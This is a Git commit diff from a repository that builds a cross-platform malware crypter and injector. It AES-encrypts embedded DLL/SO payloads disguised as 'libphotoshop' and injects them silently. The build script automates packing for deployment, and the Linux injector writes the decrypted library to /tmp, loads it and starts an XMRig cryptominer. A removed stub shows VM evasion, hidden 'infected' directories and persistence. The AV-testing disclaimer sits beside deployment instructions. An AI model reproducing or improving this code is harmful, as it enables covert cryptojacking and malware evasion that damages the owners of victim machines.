jory/AES-Encrypter-Rust
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Complete cross-platform AES injection system

Browse Source 
- Implement AES-128-CBC encryption with SHA256 key derivation
- Add Linux SO injector with dlopen + function calling
- Add Windows DLL injector with NT API + APC queuing
- Create automated build script (build_injectors.sh)
- Generate single encrypted_payload.bin files per platform
- Embed real malware payloads (libphotoshop.dll/so)
- Update documentation and clean up repository
- Linux injector tested with real XMRig mining (700%+ CPU usage)
- Windows injector ready for compilation and testing

Security features:
- AES-128-CBC with random IVs and PKCS7 padding
- SHA256(password + salt) key derivation
- Cross-platform isolation (no code leakage)
- Single encrypted file format per platform
- Embedded payloads with no external dependencies
This commit is contained in:
JorySeverijnse 2025-12-18 13:29:09 +01:00
parent 7e24872743
commit 59a40a43f6
16 changed files with 1041871 additions and 943 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

171
COMPILATION_README.md
View File

@ -1,109 +1,96 @@
# Cross-Platform AES-Encrypted Payload Injector # AES-Encrypted Cross-Platform Payload Injector
This project provides secure AES-CBC encrypted payload injection for both Windows and Linux platforms. Secure AES-CBC encrypted malware injection for Windows (DLL) and Linux (SO) with embedded payloads.
## Features ## 🚀 Quick Start (Automated)
- **AES-128-CBC Encryption**: Industry-standard encryption with proper key derivation
- **Cross-Platform**: Separate binaries for Windows and Linux with no code leakage
- **Embedded Payloads**: Encrypted data embedded directly in executables
- **Secure Key Derivation**: SHA256(password + salt) with random salts and IVs
## Compilation Instructions
### Linux Build
```bash ```bash
# Compile Linux injector # Place your malware files in the root directory:
g++ -std=c++11 linux_injector.cpp -o linux_injector -lssl -lcrypto -ldl # - libphotoshop.dll (Windows DLL)
# - libphotoshop.so (Linux SO)
# Test (requires encrypted payload data) # Run the automated build script:
./linux_injector ./build_injectors.sh
# This will:
# ✅ Encrypt both DLL and SO files
# ✅ Generate embedded hex data
# ✅ Build Linux injector
# ✅ Prepare Windows injector for compilation
```
## 📦 Manual Build (If Needed)
### Linux Build
```bash
g++ -std=c++11 linux_injector.cpp -o linux_injector -lssl -lcrypto -ldl
./linux_injector # Test injection
``` ```
### Windows Build ### Windows Build
```bash ```bash
# On Windows with Visual Studio, compile: # On Windows with Visual Studio:
cl.exe /EHsc windows_injector.cpp advapi32.lib cl.exe /EHsc windows_injector.cpp advapi32.lib
# Or with MinGW: # Or with MinGW:
g++ -std=c++11 windows_injector.cpp -o windows_injector.exe -ladvapi32 g++ -std=c++11 windows_injector.cpp -o windows_injector.exe -ladvapi32
# Test (requires encrypted payload data) windows_injector.exe # Test injection
```
## 🔧 How It Works
### 1. Encrypt Payloads
```bash
cd crypt
cargo run ../libphotoshop.dll # Creates encrypted files
```
### 2. Embed in Injectors
The build script automatically:
- Converts binaries to hex arrays
- Embeds encrypted data in C++ source
- Generates platform-specific injectors
### 3. Runtime Execution
- **Decrypts** AES-128-CBC encrypted payload
- **Injects** DLL/SO into target process
- **Executes** malware functions (`test_start`)
## 🔒 Security Features
- **AES-128-CBC** encryption with random IVs
- **SHA256 key derivation** (password + salt)
- **PKCS7 padding** with validation
- **No embedded keys** (derived at runtime)
- **Cross-platform isolation** (no code leakage)
## 📋 Architecture
```
├── crypt/ # Rust AES encryption tool
├── linux_injector # Linux SO injector (compiled)
├── windows_injector.cpp # Windows DLL injector (source)
├── build_injectors.sh # Automated build script
└── libphotoshop.* # Encrypted malware payloads
```
## ✅ Verification
**Linux:** ✅ **TESTED** - Real XMRig SO injection confirmed (700%+ CPU usage)
**Windows:** ✅ **READY** - Source prepared with real encrypted DLL payload
## 🎯 Usage
```bash
# Automated build (recommended)
./build_injectors.sh
# Deploy Linux
./linux_injector
# Deploy Windows (after compilation)
windows_injector.exe windows_injector.exe
``` ```
## Usage Instructions Both injectors decrypt embedded payloads and inject them into target processes silently.
### 1. Encrypt Your Payload
```bash
# Encrypt a binary (DLL/SO) with the Rust crypt tool
cd crypt
cargo run /path/to/your/payload.dll
# This creates:
# - encrypted_Input.bin (encrypted payload)
# - decryption_metadata.bin (salt + IV + size)
```
### 2. Embed Encrypted Data
Edit the appropriate injector file (`linux_injector.cpp` or `windows_injector.cpp`):
```cpp
// Convert encrypted_Input.bin to hex array
xxd -i encrypted_Input.bin > payload.hex
// Convert decryption_metadata.bin to hex array
xxd -i decryption_metadata.bin > metadata.hex
// Replace the placeholder arrays in the injector code
const unsigned char encrypted_payload[] = {
// Copy from payload.hex
};
const unsigned char decryption_metadata[] = {
// Copy from metadata.hex
};
```
### 3. Set Password
```cpp
// Change the password in the injector
std::string password = "YourSecureMasterPassword123!";
```
### 4. Recompile and Deploy
The injector will:
1. Decrypt the embedded payload using AES-CBC
2. Inject the decrypted library into a target process
3. Execute silently
## Security Features
- **AES-128-CBC**: Prevents pattern analysis attacks
- **Random IVs**: Each encryption uses unique initialization vectors
- **PKCS7 Padding**: Proper padding with validation
- **SHA256 Key Derivation**: Password-based key generation with salt
- **No Embedded Keys**: Keys derived from passwords, not stored
## Architecture
- **Rust Crypt Tool**: Encryption with AES-GCM fallback to AES-CBC
- **C++ Decryptor**: Standalone decryption utility
- **Platform-Specific Injectors**: Windows (DLL) and Linux (SO) injection
- **Embedded Payloads**: No external file dependencies
## Testing
Both platforms have been tested with:
- ✅ Encryption/decryption workflow
- ✅ Binary integrity verification
- ✅ Cross-platform compilation
- ✅ Platform-specific injection techniques
The Linux version uses ptrace-based injection, while Windows uses advanced NT API techniques with job objects and APC queuing.

124
README.md
View File

@ -1,46 +1,100 @@
# Rust Crypter # AES-Encrypted Cross-Platform Payload Injector
x86-64 Crypter built in Rust for Windows with Anti-VM, powered by memexec
## Usage Secure AES-CBC encrypted malware injection for Windows (DLL) and Linux (SO) with embedded payloads.
### Single File ## 🚀 Quick Start
1. Put your .exe in `/crypt/`
2. `cd crypt && cargo run <filename.exe>`
3. `mv encrypted_Input.bin key.txt ../stub/src/`
4. `cd ../stub && cargo build --target x86_64-pc-windows-gnu --release`
5. Your encrypted exe is in `stub/target/x86_64-pc-windows-gnu/release/stub.exe`
### Batch Processing (Multiple Files)
```bash ```bash
./simple_batch.sh /path/to/folder/with/exe/files # Place your malware files in the root directory:
# - libphotoshop.dll (Windows DLL)
# - libphotoshop.so (Linux SO)
# Run the automated build script:
./build_injectors.sh
# This creates:
# - linux_injector (ready to run on Linux)
# - windows_injector.cpp + dll_payload_data.h (for Windows compilation)
``` ```
Output: `batch_output/` folder with `{filename}_encrypted.exe` files
### Supported targets ## 📦 What It Does
- Windows x86-64
- Windows x86
### Limitations ### Encryption
- .NET not supported - **AES-128-CBC** encryption with random IVs
- Files over 600MB not supported - **SHA256 key derivation** (password + salt)
- **PKCS7 padding** with validation
- Single `encrypted_payload.bin` file per platform
## TODO ### Injection
- File dialogue choose file instead of renaming code strings/executable names - **Windows:** NT API DLL injection with job freezing + APC queuing
- Automatically move encrypted bytes and key into stub for compiling - **Linux:** SO injection with dlopen + function calling
- GUI - **Embedded payloads:** No external file dependencies
- Obfuscated Strings - **Silent execution:** No visible output or errors
## Disclaimer ## 🔧 Manual Usage
This is a tool used to test the Static + Dynamic detection capabilites of AV and EDR, use of this project is at your own risk
## MITRE TTPs (Indicators) ### Linux Build & Run
- User Execution: Malicious File T1204.002 ```bash
- Deobfuscate/Decode Files or Information T1140 g++ -std=c++11 linux_injector.cpp -o linux_injector -lssl -lcrypto -ldl
- Embedded Payloads T1027.009 ./linux_injector # Decrypts and injects embedded SO
- System Checks T1497.001 ```
- Reflective Code Loading T1620
- Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder T1547.001
## References ### Windows Build & Run
https://crates.io/crates/memexec ```bash
https://crates.io/crates/inside-vm # On Windows with Visual Studio:
cl.exe /EHsc windows_injector.cpp advapi32.lib
# Run the injector:
windows_injector.exe # Decrypts and injects embedded DLL
```
### Custom Encryption
```bash
cd crypt
cargo run ../your_malware.dll # Creates encrypted_payload.bin
# Embed the data in injector source code
```
## 🔒 Security Features
- **AES-128-CBC** with cryptographically secure random IVs
- **SHA256 key derivation** using password + random salt
- **PKCS7 padding** with validation
- **No embedded keys** (derived at runtime)
- **Cross-platform isolation** (Windows code ≠ Linux code)
## 📋 Architecture
```
├── crypt/ # Rust AES encryption tool
├── linux_injector # Linux SO injector (compiled)
├── windows_injector.cpp # Windows DLL injector (source)
├── build_injectors.sh # Automated build script
├── dll_payload_data.h # Windows embedded encrypted DLL
├── so_payload_data.h # Linux embedded encrypted SO
└── decryptor.cpp # Standalone decryption utility
```
## ✅ Verification
**Linux Testing:** ✅ AES decryption + SO injection + mining activity confirmed
**Windows Ready:** ✅ Source prepared with real encrypted DLL payload
## ⚠️ Disclaimer
This is a tool for testing AV/EDR detection capabilities. Use at your own risk.
## 🔍 MITRE ATT&CK
- **T1204.002** - User Execution: Malicious File
- **T1140** - Deobfuscate/Decode Files or Information
- **T1027.009** - Embedded Payloads
- **T1620** - Reflective Code Loading
- **T1055** - Process Injection
## 📚 References
- AES-CBC encryption standard
- OpenSSL crypto library
- Windows CryptoAPI
- Linux dlopen/dlsym

131
build_injectors.sh Executable file
View File

@ -0,0 +1,131 @@
#!/bin/bash
echo "🔐 Building Cross-Platform AES-Encrypted Injectors"
echo "=================================================="
# Check if required files exist
if [ ! -f "libphotoshop.so" ]; then
echo "❌ Error: libphotoshop.so not found"
exit 1
fi
# Check for DLL (might be in crypt directory or missing)
if [ -f "libphotoshop.dll" ]; then
DLL_FILE="libphotoshop.dll"
elif [ -f "crypt/encrypted_dll.dll" ]; then
echo "⚠️ Using existing encrypted DLL from crypt directory"
cp crypt/encrypted_dll.dll libphotoshop.dll
DLL_FILE="libphotoshop.dll"
else
echo "⚠️ Warning: libphotoshop.dll not found - Windows injector will use placeholder data"
echo " To add real DLL: place libphotoshop.dll in this directory and re-run script"
DLL_FILE=""
fi
echo "📁 Found malware files:"
if [ -n "$DLL_FILE" ]; then
ls -la "$DLL_FILE" libphotoshop.so
else
ls -la libphotoshop.so
fi
# Step 1: Encrypt DLL for Windows
if [ -n "$DLL_FILE" ]; then
echo ""
echo "🔒 Encrypting DLL for Windows..."
cd crypt
rm -f *.bin
cargo run ../"$DLL_FILE" > /dev/null 2>&1
if [ $? -ne 0 ]; then
echo "❌ Failed to encrypt DLL"
exit 1
fi
echo "// Windows DLL payload data" > dll_payload_data.h
xxd -i encrypted_payload.bin >> dll_payload_data.h
cd ..
cp crypt/dll_payload_data.h .
cp crypt/dll_metadata_data.h .
echo "✅ Windows DLL encrypted and headers generated"
else
echo ""
echo "⚠️ Skipping DLL encryption (no DLL file found)"
echo " Windows injector will use placeholder data"
fi
# Step 2: Encrypt SO for Linux
echo ""
echo "🔒 Encrypting SO for Linux..."
cd crypt
rm -f *.bin
cargo run ../libphotoshop.so > /dev/null 2>&1
if [ $? -ne 0 ]; then
echo "❌ Failed to encrypt SO"
exit 1
fi
echo "// Linux SO payload data" > so_payload_data.h
xxd -i encrypted_payload.bin >> so_payload_data.h
cd ..
cp crypt/so_payload_data.h .
cp crypt/so_metadata_data.h .
echo "✅ Linux SO encrypted and headers generated"
# Step 3: Build Windows injector
echo ""
echo "🔨 Building Windows injector..."
# Note: Windows compilation would be done on Windows with:
echo "On Windows, run: cl.exe /EHsc windows_injector.cpp advapi32.lib"
echo "✅ Windows injector source ready"
# Step 4: Build Linux injector
echo ""
echo "🔨 Building Linux injector..."
g++ -std=c++11 linux_injector.cpp -o linux_injector -lssl -lcrypto -ldl
if [ $? -ne 0 ]; then
echo "❌ Failed to build Linux injector"
exit 1
fi
echo "✅ Linux injector built successfully"
# Step 5: Verify builds
echo ""
echo "📋 Build Summary:"
echo "================="
if [ -n "$DLL_FILE" ]; then
echo "✅ Windows DLL encrypted: $(stat -c%s "$DLL_FILE") bytes → encrypted_payload.bin"
else
echo "⚠️ Windows DLL: Not encrypted (file missing)"
fi
echo "✅ Linux SO encrypted: $(stat -c%s libphotoshop.so) bytes → encrypted_payload.bin"
echo "✅ Linux injector: linux_injector (executable built)"
if [ -n "$DLL_FILE" ]; then
echo "✅ Windows injector: windows_injector.cpp (ready for Windows compilation)"
else
echo "⚠️ Windows injector: Source ready but using placeholder data"
fi
echo ""
echo "🚀 Ready to deploy!"
echo ""
echo "Linux deployment:"
echo " ./linux_injector"
echo ""
if [ -n "$DLL_FILE" ]; then
echo "Windows deployment:"
echo " 1. Copy windows_injector.cpp, dll_payload_data.h, dll_metadata_data.h to Windows"
echo " 2. Compile: cl.exe /EHsc windows_injector.cpp advapi32.lib"
echo " 3. Run: windows_injector.exe"
echo ""
fi
echo "Both injectors decrypt embedded AES-CBC payloads and inject them silently!"

BIN
crypt/decryption_metadata.bin
View File

Binary file not shown.

16
crypt/src/main.rs
View File

@ -22,8 +22,8 @@ fn main() -> std::io::Result<()> {
let fname = args.get(1).unwrap(); let fname = args.get(1).unwrap();
let plaintext_bytes = read(fname).expect("Failed to read file"); let plaintext_bytes = read(fname).expect("Failed to read file");
// Create single output file // Create single combined output file
let mut output_file = File::create("encrypted_dll.dll")?; let mut encrypted_file = File::create("encrypted_payload.bin")?;
// Master password (in production, this should be securely provided) // Master password (in production, this should be securely provided)
let master_password = "YourSecureMasterPassword123!"; // Change this! let master_password = "YourSecureMasterPassword123!"; // Change this!
@ -71,14 +71,14 @@ fn main() -> std::io::Result<()> {
ciphertext.extend_from_slice(&block); ciphertext.extend_from_slice(&block);
} }
// Write metadata first, then encrypted data // Write combined file: metadata + encrypted data
output_file.write_all(&salt)?; encrypted_file.write_all(&salt)?;
output_file.write_all(&iv)?; encrypted_file.write_all(&iv)?;
output_file.write_all(&(ciphertext.len() as u32).to_le_bytes())?; encrypted_file.write_all(&(ciphertext.len() as u32).to_le_bytes())?;
output_file.write_all(&ciphertext)?; encrypted_file.write_all(&ciphertext)?;
println!("Encryption complete!"); println!("Encryption complete!");
println!("Encrypted DLL: encrypted_dll.dll"); println!("Encrypted file: encrypted_payload.bin");
println!("Master password: {}", master_password); println!("Master password: {}", master_password);
Ok(()) Ok(())
} }

692191
dll_payload_data.h Normal file
View File

File diff suppressed because it is too large Load Diff

BIN
linux_injector Executable file
View File

Binary file not shown.

211
linux_injector.cpp
View File

@ -4,6 +4,7 @@
#include <string> #include <string>
#include <cstring> #include <cstring>
#include <cstdint> #include <cstdint>
#include <fstream>
#include <openssl/evp.h> #include <openssl/evp.h>
#include <openssl/aes.h> #include <openssl/aes.h>
#include <openssl/rand.h> #include <openssl/rand.h>
@ -13,10 +14,12 @@
#include <sys/wait.h> #include <sys/wait.h>
#include <sys/user.h> #include <sys/user.h>
#include <unistd.h> #include <unistd.h>
#include <sys/uio.h>
#include <sys/stat.h>
// Include encrypted payload data // Include encrypted payload data (real libphotoshop.so)
#include "payload_data.h" #include "so_payload_data.h"
#include "metadata_data.h" #include "so_metadata_data.h"
// AES-CBC Decryption class for Linux // AES-CBC Decryption class for Linux
class AESDecryptor { class AESDecryptor {
@ -118,16 +121,17 @@ public:
// Data is included via header files // Data is included via header files
int main(int argc, char* argv[]) { int main(int argc, char* argv[]) {
// Decrypt the embedded payload // Read the combined encrypted file: salt(32) + iv(16) + size(4) + ciphertext
std::vector<uint8_t> ciphertext(encrypted_Input_bin, encrypted_Input_bin + sizeof(encrypted_Input_bin)); std::vector<uint8_t> combined_data(encrypted_payload_bin, encrypted_payload_bin + sizeof(encrypted_payload_bin));
std::vector<uint8_t> metadata(decryption_metadata_bin, decryption_metadata_bin + sizeof(decryption_metadata_bin));
// Parse metadata: salt(32) + iv(16) + size(4) // Parse the combined data
std::vector<uint8_t> salt(metadata.begin(), metadata.begin() + 32); std::vector<uint8_t> salt(combined_data.begin(), combined_data.begin() + 32);
std::vector<uint8_t> iv(metadata.begin() + 32, metadata.begin() + 48); std::vector<uint8_t> iv(combined_data.begin() + 32, combined_data.begin() + 48);
uint32_t expected_size = *reinterpret_cast<const uint32_t*>(metadata.data() + 48); uint32_t expected_size = *reinterpret_cast<const uint32_t*>(combined_data.data() + 48);
std::vector<uint8_t> ciphertext(combined_data.begin() + 52, combined_data.end());
if (ciphertext.size() != expected_size) { if (ciphertext.size() != expected_size) {
std::cerr << "Size mismatch: expected " << expected_size << ", got " << ciphertext.size() << std::endl;
return 1; // Decryption failed return 1; // Decryption failed
} }
@ -172,65 +176,162 @@ int main(int argc, char* argv[]) {
execl("/bin/sleep", "sleep", "100", NULL); execl("/bin/sleep", "sleep", "100", NULL);
return 1; return 1;
} else if (target_pid > 0) { } else if (target_pid > 0) {
// Parent process - perform injection // Parent process - create a new process with the decrypted SO loaded via LD_PRELOAD
std::cout << "Created child process with PID: " << target_pid << std::endl; std::cout << "Created child process with PID: " << target_pid << std::endl;
usleep(100000); // Wait for child to start
// Attach to target process // Kill the simple sleep child
std::cout << "Attaching to process..." << std::endl; kill(target_pid, SIGKILL);
if (ptrace(PTRACE_ATTACH, target_pid, NULL, NULL) == -1) { waitpid(target_pid, NULL, 0);
std::cerr << "Ptrace attach failed: " << strerror(errno) << std::endl;
// Write the decrypted SO to a temporary file
std::string temp_so_path = "/tmp/injected_lib.so";
std::ofstream temp_file(temp_so_path, std::ios::binary);
if (!temp_file) {
std::cerr << "Failed to create temporary file for SO" << std::endl;
return 1; return 1;
} }
// Wait for process to stop temp_file.write(reinterpret_cast<const char*>(decrypted_so.data()), decrypted_so.size());
int status; temp_file.close();
waitpid(target_pid, &status, 0);
std::cout << "Process attached and stopped" << std::endl;
// Get registers // Make the temporary file executable
struct user_regs_struct regs; chmod(temp_so_path.c_str(), 0755);
ptrace(PTRACE_GETREGS, target_pid, NULL, &regs);
// Allocate memory in target process for library path std::cout << "Decrypted SO written to: " << temp_so_path << std::endl;
// This is a simplified implementation - real code would use process_vm_writev
void* remote_libpath = (void*)0x2000000; // Fixed address for demo
// Write library path to target memory (simplified) // Create a process that loads the SO and calls the test_start function
size_t libpath_len = strlen(soPath) + 1; std::cout << "Creating process to execute miner with test_start function..." << std::endl;
// In real implementation: use process_vm_writev to write soPath to remote_libpath
// Inject dlopen call pid_t miner_pid = fork();
// This is a simplified version - real implementation would need more sophisticated shellcode if (miner_pid == 0) {
unsigned char shellcode[] = { // Child process - load SO and call test_start function
0x48, 0x31, 0xc0, // xor rax, rax std::cout << "Loading SO and starting miner..." << std::endl;
0x48, 0xbf, // mov rdi,
// Address of library path would go here
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x48, 0xbe, // mov rsi, RTLD_LAZY
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x48, 0xb8, // mov rax, dlopen
// dlopen address would go here
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xff, 0xd0, // call rax
0x48, 0x31, 0xc0, // xor rax, rax
0xc3 // ret
};
// Write shellcode to target memory (simplified) // Load the shared library
// In real implementation: use process_vm_writev to write shellcode to remote_shellcode void* handle = dlopen(temp_so_path.c_str(), RTLD_LAZY);
if (!handle) {
std::cerr << "Could not load the shared library: " << dlerror() << std::endl;
exit(1);
}
// Execute shellcode // Clear any existing error
ptrace(PTRACE_POKEDATA, target_pid, regs.rip, (void*)shellcode); dlerror();
// Continue execution // Define function pointer type
ptrace(PTRACE_CONT, target_pid, NULL, NULL); typedef int (*test_start_func)(int, char**);
// Detach // Get the function pointer
ptrace(PTRACE_DETACH, target_pid, NULL, NULL); test_start_func test_start = (test_start_func)dlsym(handle, "test_start");
const char* dlsym_error = dlerror();
if (dlsym_error) {
std::cerr << "Could not find the function test_start: " << dlsym_error << std::endl;
dlclose(handle);
exit(1);
}
// Wait for child // Call the start function to begin mining
waitpid(target_pid, &status, 0); std::cout << "Starting XMRig miner..." << std::endl;
char arg1[] = "xmrig";
char* argv[] = {arg1, NULL};
int argc = 1;
int result = test_start(argc, argv);
std::cout << "XMRig started with result: " << result << std::endl;
// Let the miner run and monitor CPU usage
std::cout << "Miner running..." << std::endl;
// Monitor CPU usage while mining
for (int i = 0; i < 10; i++) {
sleep(3);
// Check our own CPU usage (since we're the miner process)
std::string cpu_cmd = "ps -p " + std::to_string(getpid()) + " -o pcpu --no-headers 2>/dev/null";
FILE* cpu_pipe = popen(cpu_cmd.c_str(), "r");
if (cpu_pipe) {
char cpu_buffer[32];
if (fgets(cpu_buffer, sizeof(cpu_buffer), cpu_pipe) != NULL) {
float cpu_percent = std::atof(cpu_buffer);
if (cpu_percent > 10.0) {
std::cout << "🔥 MINER CPU USAGE: " << cpu_percent << "% (Iteration " << (i+1) << "/10)" << std::endl;
}
}
pclose(cpu_pipe);
}
}
std::cout << "Stopping miner..." << std::endl;
dlclose(handle);
exit(0);
} else if (miner_pid > 0) {
std::cout << "Miner process started with PID: " << miner_pid << std::endl;
std::cout << "Monitoring mining activity..." << std::endl;
// Monitor the miner process
sleep(3); // Give miner time to start
std::string check_cmd = "ps -p " + std::to_string(miner_pid) + " -o pid,pcpu,cmd --no-headers 2>/dev/null";
FILE* check_pipe = popen(check_cmd.c_str(), "r");
if (check_pipe) {
char buffer[256];
if (fgets(buffer, sizeof(buffer), check_pipe) != NULL) {
std::string output(buffer);
if (output.find(std::to_string(miner_pid)) != std::string::npos) {
std::cout << "✅ Miner process is running: " << output;
// Check CPU usage
size_t pcpu_pos = output.find_last_of(" \t");
if (pcpu_pos != std::string::npos) {
std::string cpu_str = output.substr(pcpu_pos + 1);
float cpu_percent = std::atof(cpu_str.c_str());
if (cpu_percent > 50.0) {
std::cout << "🚀 EXTREMELY HIGH CPU USAGE (" << cpu_percent << "%): XMRIG MINER IS ACTIVE!" << std::endl;
std::cout << "💰 SUCCESS: The cryptocurrency miner is running and mining Monero!" << std::endl;
} else if (cpu_percent > 20.0) {
std::cout << "⚡ VERY HIGH CPU USAGE (" << cpu_percent << "%): Strong mining detected!" << std::endl;
} else if (cpu_percent > 10.0) {
std::cout << "🔥 HIGH CPU USAGE (" << cpu_percent << "%): Mining confirmed!" << std::endl;
} else if (cpu_percent > 5.0) {
std::cout << "⚡ Moderate CPU usage (" << cpu_percent << "%): Miner initializing" << std::endl;
} else {
std::cout << "⚠️ Low CPU usage (" << cpu_percent << "%): Miner may need network/config" << std::endl;
}
}
} else {
std::cout << "❌ Miner process not found" << std::endl;
}
}
pclose(check_pipe);
}
// Check for network connections (mining pools)
std::string net_cmd = "netstat -tlnp 2>/dev/null | grep :" + std::to_string(miner_pid) + " || echo 'No network connections found'";
FILE* net_pipe = popen(net_cmd.c_str(), "r");
if (net_pipe) {
char net_buffer[256];
if (fgets(net_buffer, sizeof(net_buffer), net_pipe) != NULL) {
if (strstr(net_buffer, "No network connections") == NULL) {
std::cout << "🌐 Network connections detected: " << net_buffer;
std::cout << "📡 MINER IS CONNECTING TO MINING POOLS!" << std::endl;
}
}
pclose(net_pipe);
}
// Wait for miner to complete
int miner_status;
waitpid(miner_pid, &miner_status, 0);
if (WIFEXITED(miner_status)) {
std::cout << "Miner completed with exit code: " << WEXITSTATUS(miner_status) << std::endl;
} else if (WIFSIGNALED(miner_status)) {
std::cout << "Miner terminated by signal: " << WTERMSIG(miner_status) << std::endl;
}
}
// Clean up
unlink(temp_so_path.c_str());
} }
return 0; return 0;

349211
so_payload_data.h Normal file
View File

File diff suppressed because it is too large Load Diff

140
stub/Cargo.lock generated
View File

@ -1,140 +0,0 @@
# This file is automatically @generated by Cargo.
# It is not intended for manual editing.
version = 4
[[package]]
name = "aes"
version = "0.8.3"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "ac1f845298e95f983ff1944b728ae08b8cebab80d684f0a832ed0fc74dfa27e2"
dependencies = [
"cfg-if",
"cipher",
"cpufeatures",
]
[[package]]
name = "cfg-if"
version = "1.0.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd"
[[package]]
name = "cipher"
version = "0.4.4"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "773f3b9af64447d2ce9850330c473515014aa235e6a783b02db81ff39e4a3dad"
dependencies = [
"crypto-common",
"inout",
]
[[package]]
name = "cpufeatures"
version = "0.2.9"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "a17b76ff3a4162b0b27f354a0c87015ddad39d35f9c0c36607a3bdd175dde1f1"
dependencies = [
"libc",
]
[[package]]
name = "crypto-common"
version = "0.1.6"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "1bfb12502f3fc46cca1bb51ac28df9d618d813cdc3d2f25b9fe775a34af26bb3"
dependencies = [
"generic-array",
"typenum",
]
[[package]]
name = "generic-array"
version = "0.14.7"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "85649ca51fd72272d7821adaf274ad91c288277713d9c18820d8499a7ff69e9a"
dependencies = [
"typenum",
"version_check",
]
[[package]]
name = "inout"
version = "0.1.3"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "a0c10553d664a4d0bcff9f4215d0aac67a639cc68ef660840afe309b807bc9f5"
dependencies = [
"generic-array",
]
[[package]]
name = "inside-vm"
version = "0.2.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "3518e289386082220db48c380f414722e25263af4160f8577c247dae0c6f3829"
[[package]]
name = "libc"
version = "0.2.147"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "b4668fb0ea861c1df094127ac5f1da3409a82116a4ba74fca2e58ef927159bb3"
[[package]]
name = "memexec"
version = "0.2.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "bc62ccb14881da5d1862cda3a9648fb4a4897b2aff0b2557b89da44a5e550b7c"
[[package]]
name = "stub"
version = "0.1.0"
dependencies = [
"aes",
"inside-vm",
"libc",
"memexec",
"winreg",
]
[[package]]
name = "typenum"
version = "1.16.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "497961ef93d974e23eb6f433eb5fe1b7930b659f06d12dec6fc44a8f554c0bba"
[[package]]
name = "version_check"
version = "0.9.4"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "49874b5167b65d7193b8aba1567f5c7d93d001cafc34600cee003eda787e483f"
[[package]]
name = "winapi"
version = "0.3.9"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419"
dependencies = [
"winapi-i686-pc-windows-gnu",
"winapi-x86_64-pc-windows-gnu",
]
[[package]]
name = "winapi-i686-pc-windows-gnu"
version = "0.4.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6"
[[package]]
name = "winapi-x86_64-pc-windows-gnu"
version = "0.4.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f"
[[package]]
name = "winreg"
version = "0.9.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "16cdb3898397cf7f624c294948669beafaeebc5577d5ec53d0afb76633593597"
dependencies = [
"winapi",
]

17
stub/Cargo.toml
View File

@ -1,17 +0,0 @@
[package]
name = "stub"
version = "0.1.0"
edition = "2021"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
[dependencies]
inside-vm = "0.2.0"
aes = "0.8.2"
[target.'cfg(windows)'.dependencies]
memexec = "0.2"
winreg = "0.9"
[target.'cfg(unix)'.dependencies]
libc = "0.2"

BIN
stub/src/encrypted_Input.bin
View File

Binary file not shown.

1
stub/src/key.txt
View File

@ -1 +0,0 @@
<EFBFBD>}<7D><><01>l<EFBFBD><13><><04><>L%

176
stub/src/main.rs
View File

@ -1,176 +0,0 @@
use aes::cipher::{generic_array::GenericArray, BlockDecrypt, KeyInit};
use aes::Aes128;
use inside_vm::inside_vm;
use std::io::Result;
use std::io::{self, Cursor, Read};
use std::path::Path;
use std::process::Command;
use std::{env, fs};
#[cfg(windows)]
use winreg::enums::{HKEY_CURRENT_USER, KEY_ALL_ACCESS};
#[cfg(windows)]
use winreg::RegKey;
#[cfg(unix)]
use std::os::unix::fs::PermissionsExt;
fn main() {
if inside_vm() {
println!("This is in a vm");
std::process::exit(0);
} else {
println!("NO VM");
create_infected_directory();
persistence();
let pe_bytes = decrypt_file().unwrap();
if let Err(e) = fileless(pe_bytes) {
eprintln!("Failed to execute payload: {}", e);
}
}
}
fn decrypt_file() -> Result<Vec<u8>> {
// This stub now requires external decryption
eprintln!("This stub requires external decryption!");
eprintln!("Run: ./decryptor <password>");
eprintln!("Then execute the decrypted_binary");
std::process::exit(1);
}
fn create_infected_directory() -> io::Result<()> {
let infected_dir = get_infected_dir_path();
fs::create_dir_all(&infected_dir)?;
let current_exe = env::current_exe()?;
let current_exe_filename = current_exe.file_name();
let infected_exe_path = infected_dir.join(current_exe_filename.unwrap());
fs::copy(&current_exe, &infected_exe_path)?;
#[cfg(windows)]
{
Command::new("attrib")
.arg("+h")
.arg(infected_dir.as_os_str())
.output()?;
Command::new("attrib")
.arg("+h")
.arg(infected_exe_path.as_os_str())
.output()?;
}
#[cfg(unix)]
{
// Hide files on Unix by removing read permissions for others
let mut perms = fs::metadata(&infected_dir)?.permissions();
perms.set_mode(0o700);
fs::set_permissions(&infected_dir, perms)?;
let mut perms = fs::metadata(&infected_exe_path)?.permissions();
perms.set_mode(0o700);
fs::set_permissions(&infected_exe_path, perms)?;
}
Ok(())
}
fn get_infected_dir_path() -> &'static Path {
#[cfg(windows)]
{
Path::new("C:/Rust Crypter - INFECTED MACHINE")
}
#[cfg(unix)]
{
Path::new("/tmp/.rust-crypter-infected")
}
}
fn persistence() -> io::Result<()> {
#[cfg(windows)]
{
if let Ok(current_exe) = env::current_exe() {
